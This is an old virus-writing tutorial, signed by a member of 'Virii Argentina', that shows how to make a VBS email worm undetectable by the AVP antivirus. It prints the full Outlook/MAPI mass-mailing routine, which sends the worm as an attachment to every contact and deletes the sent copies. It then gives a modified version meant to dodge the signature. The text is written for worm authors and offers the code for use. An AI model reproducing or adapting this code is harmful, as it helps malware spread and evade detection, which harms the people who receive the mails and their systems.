Anti Avp Vbs I-Worms Detection. By [K]Alamar
| In one of the last Updates,
the Avp antivirus has added a detection for i-Worms that uses the
Outlook replication method, used in almost all the Vbs and Js worms,
Like the I Love you, Bubbleboy and all of them. Ok, this will made your I-worm undetectable for avp till they add it to the database; i'm pretty sure that if in your worm you use Outlook replication you use this code, or one similar: --- Dim fso, ws Set fso = CreateObject("Scripting.filesystemobject") Set ws = CreateObject("WScript.Shell") Set OApp = CreateObject("Outlook.Application") if oapp="Outlook" then Set Mapi = OApp.GetNameSpace("MAPI") For Each AddList In Mapi.AddressLists If AddList.AddressEntries.Count <> 0 Then For AddListCount = 1 To AddList.AddressEntries.Count * Set AddListEntry = AddList.AddressEntries(AddListCount) Set msg = OApp.CreateItem(0) msg.To = AddListEntry.Address msg.Subject = "Your subject" msg.Body = "The body" msg.Attachments.Add "path to your Worm" msg.DeleteAfterSubmit = True If msg.To <> "" Then msg.Send End If Next End If Next end if --- The only thing that you should do is add one line and change another, like here (lines with * are the modified ones): --- Dim fso, ws Set fso = CreateObject("Scripting.filesystemobject") Set ws = CreateObject("WScript.Shell") Set OApp = CreateObject("Outlook.Application") if oapp="Outlook" then Set Mapi = OApp.GetNameSpace("MAPI") For Each AddList In Mapi.AddressLists If AddList.AddressEntries.Count <> 0 Then AddlistCount = AddList.AddressEntries.Count * For AddListCount = 1 To AddlistCount * Set AddListEntry = AddList.AddressEntries(AddListCount) Set msg = OApp.CreateItem(0) msg.To = AddListEntry.Address msg.Subject = "Your subject" msg.Body = "The body" msg.Attachments.Add "path to your Worm" msg.DeleteAfterSubmit = True If msg.To <> "" Then msg.Send End If Next End If Next end if --- You should delete the "*" if you want the worm to work. I think that if you know something about I-Worms you should understood what i did; i just create a new variable, AddlistCount , and make it be like the number of addressentries, and then i use that new variable in the next line. I hope you understood This. [K]Alamar - kalamar@virii.com.ar Member Virii Argentina Http://www.virii.com.ar |